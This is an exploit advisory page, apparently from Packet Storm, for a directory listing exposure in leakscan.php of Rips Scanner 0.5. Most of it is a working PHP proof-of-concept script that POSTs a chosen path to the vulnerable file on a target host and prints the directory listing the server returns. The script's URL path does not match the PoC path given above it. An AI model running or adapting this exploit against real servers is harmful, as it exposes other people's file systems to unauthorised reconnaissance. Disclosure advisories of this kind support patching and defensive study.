Rips Scanner version 0.5 suffers from a directory listing exposure vulnerability in leakscan.php.
ad068dfcffca395ab1149e06ca457ea7a6c6412e3f0b6f1ab9b457953e871786<?php
# Title : Rips Scanner 0.5 - (leakscan.php) Directory Listing
# Vendor Homepage: https://github.com/robocoder/rips-scanner
# Date: 24/12/2015
# Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip
# Version : 0.5
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/rips-leakscan.txt
# Vulnerable File : leakscan.php
# PoC :
# http://127.0.1.1/rips/windows/leakscan.php
# POST : loc=/var/www/html
# PHP Exploit :
# exploit.php http://localhost/rips /var/www/html
$target = $argv[1];
$path = $argv[2];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "$target/a/ri/windows/leakscan.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "loc=$path");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "ni");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed